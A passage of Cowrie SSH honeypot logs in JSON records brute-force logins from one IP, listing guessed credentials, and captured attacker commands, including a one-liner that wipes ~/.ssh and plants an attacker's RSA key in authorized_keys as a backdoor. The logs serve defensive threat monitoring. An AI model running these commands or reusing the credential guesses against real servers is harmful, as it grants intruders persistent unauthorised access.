openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:22:05.629589Z","src_ip":"212.227.235.229","session":"de28e9ef8edc"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:22:06.652081Z","src_ip":"212.227.235.229","session":"de28e9ef8edc"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:22:07.906736Z","src_ip":"212.227.235.229","session":"de28e9ef8edc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45807,"dst_ip":"1.2.3.4","dst_port":22,"session":"a349e1423589","protocol":"ssh","message":"New connection: 212.227.235.229:45807 (1.2.3.4:22) [session: a349e1423589]","sensor":"my-vps","timestamp":"2025-09-09T02:22:08.166188Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:22:08.171981Z","src_ip":"212.227.235.229","session":"a349e1423589"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:22:08.430024Z","src_ip":"212.227.235.229","session":"a349e1423589"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:22:09.448198Z","src_ip":"212.227.235.229","session":"a349e1423589"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:22:09.697309Z","src_ip":"212.227.235.229","session":"7e224ce6240f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:22:09.704603Z","src_ip":"212.227.235.229","session":"a349e1423589"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46022,"dst_ip":"1.2.3.4","dst_port":22,"session":"c99f7544ed09","protocol":"ssh","message":"New connection: 212.227.235.229:46022 (1.2.3.4:22) [session: c99f7544ed09]","sensor":"my-vps","timestamp":"2025-09-09T02:22:42.185018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:22:42.185988Z","src_ip":"212.227.235.229","session":"c99f7544ed09"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:22:42.293981Z","src_ip":"212.227.235.229","session":"c99f7544ed09"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"P@ssword123","message":"login attempt [deploy/P@ssword123] failed","sensor":"my-vps","timestamp":"2025-09-09T02:22:42.767937Z","src_ip":"212.227.235.229","session":"c99f7544ed09"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:22:43.879169Z","src_ip":"212.227.235.229","session":"c99f7544ed09"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:22:43.931108Z","src_ip":"212.227.235.229","session":"2410e36012f4"}
{"eventid":"cowrie.session.closed","duration":180.28130412101746,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:22:43.936119Z","src_ip":"212.227.235.229","session":"2410e36012f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34430,"dst_ip":"1.2.3.4","dst_port":22,"session":"14b35469e979","protocol":"ssh","message":"New connection: 212.227.235.229:34430 (1.2.3.4:22) [session: 14b35469e979]","sensor":"my-vps","timestamp":"2025-09-09T02:22:47.796578Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:22:47.797705Z","src_ip":"212.227.235.229","session":"14b35469e979"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:22:47.884027Z","src_ip":"212.227.235.229","session":"14b35469e979"}
{"eventid":"cowrie.login.success","username":"root","password":"1234512345","message":"login attempt [root/1234512345] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:22:48.271421Z","src_ip":"212.227.235.229","session":"14b35469e979"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:22:48.504767Z","src_ip":"212.227.235.229","session":"14b35469e979"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:22:48.505462Z","src_ip":"212.227.235.229","session":"14b35469e979"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:22:48.506364Z","src_ip":"212.227.235.229","session":"14b35469e979"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:22:48.593632Z","src_ip":"212.227.235.229","session":"14b35469e979"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:22:48.783602Z","src_ip":"212.227.235.229","session":"14b35469e979"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:22:48.784262Z","src_ip":"212.227.235.229","session":"14b35469e979"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:22:48.872740Z","src_ip":"212.227.235.229","session":"14b35469e979"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:22:48.873624Z","src_ip":"212.227.235.229","session":"14b35469e979"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34438,"dst_ip":"1.2.3.4","dst_port":22,"session":"14a28fa12a85","protocol":"ssh","message":"New connection: 212.227.235.229:34438 (1.2.3.4:22) [session: 14a28fa12a85]","sensor":"my-vps","timestamp":"2025-09-09T02:22:48.958170Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:22:48.959381Z","src_ip":"212.227.235.229","session":"14a28fa12a85"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:22:49.046411Z","src_ip":"212.227.235.229","session":"14a28fa12a85"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:22:49.431797Z","src_ip":"212.227.235.229","session":"14a28fa12a85"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:22:50.519935Z","src_ip":"212.227.235.229","session":"14a28fa12a85"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34452,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce2172cb153c","protocol":"ssh","message":"New connection: 212.227.235.229:34452 (1.2.3.4:22) [session: ce2172cb153c]","sensor":"my-vps","timestamp":"2025-09-09T02:22:50.601553Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:22:50.602173Z","src_ip":"212.227.235.229","session":"ce2172cb153c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:22:50.685500Z","src_ip":"212.227.235.229","session":"ce2172cb153c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:22:51.057090Z","src_ip":"212.227.235.229","session":"ce2172cb153c"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:22:51.140778Z","src_ip":"212.227.235.229","session":"ce2172cb153c"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:22:51.141675Z","src_ip":"212.227.235.229","session":"14b35469e979"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46944,"dst_ip":"1.2.3.4","dst_port":22,"session":"f34acb02e885","protocol":"ssh","message":"New connection: 212.227.235.229:46944 (1.2.3.4:22) [session: f34acb02e885]","sensor":"my-vps","timestamp":"2025-09-09T02:22:54.644739Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:22:54.647048Z","src_ip":"212.227.235.229","session":"f34acb02e885"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:22:55.022344Z","src_ip":"212.227.235.229","session":"f34acb02e885"}
{"eventid":"cowrie.login.failed","username":"dev","password":"123123","message":"login attempt [dev/123123] failed","sensor":"my-vps","timestamp":"2025-09-09T02:22:56.539181Z","src_ip":"212.227.235.229","session":"f34acb02e885"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:22:57.927424Z","src_ip":"212.227.235.229","session":"f34acb02e885"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39180,"dst_ip":"1.2.3.4","dst_port":22,"session":"0517930127b1","protocol":"ssh","message":"New connection: 212.227.235.229:39180 (1.2.3.4:22) [session: 0517930127b1]","sensor":"my-vps","timestamp":"2025-09-09T02:22:58.938070Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:22:58.939958Z","src_ip":"212.227.235.229","session":"0517930127b1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:22:59.199174Z","src_ip":"212.227.235.229","session":"0517930127b1"}
{"eventid":"cowrie.login.failed","username":"tester","password":"password123","message":"login attempt [tester/password123] failed","sensor":"my-vps","timestamp":"2025-09-09T02:23:00.237277Z","src_ip":"212.227.235.229","session":"0517930127b1"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:23:01.499519Z","src_ip":"212.227.235.229","session":"0517930127b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57229,"dst_ip":"1.2.3.4","dst_port":22,"session":"718786a8695a","protocol":"ssh","message":"New connection: 212.227.235.229:57229 (1.2.3.4:22) [session: 718786a8695a]","sensor":"my-vps","timestamp":"2025-09-09T02:23:10.410040Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:23:10.415167Z","src_ip":"212.227.235.229","session":"718786a8695a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:23:10.667460Z","src_ip":"212.227.235.229","session":"718786a8695a"}
{"eventid":"cowrie.login.failed","username":"debian","password":"qwerty","message":"login attempt [debian/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T02:23:11.679512Z","src_ip":"212.227.235.229","session":"718786a8695a"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:23:12.933529Z","src_ip":"212.227.235.229","session":"718786a8695a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57538,"dst_ip":"1.2.3.4","dst_port":22,"session":"6462bad8b379","protocol":"ssh","message":"New connection: 212.227.235.229:57538 (1.2.3.4:22) [session: 6462bad8b379]","sensor":"my-vps","timestamp":"2025-09-09T02:23:23.265446Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:23:23.266557Z","src_ip":"212.227.235.229","session":"6462bad8b379"}
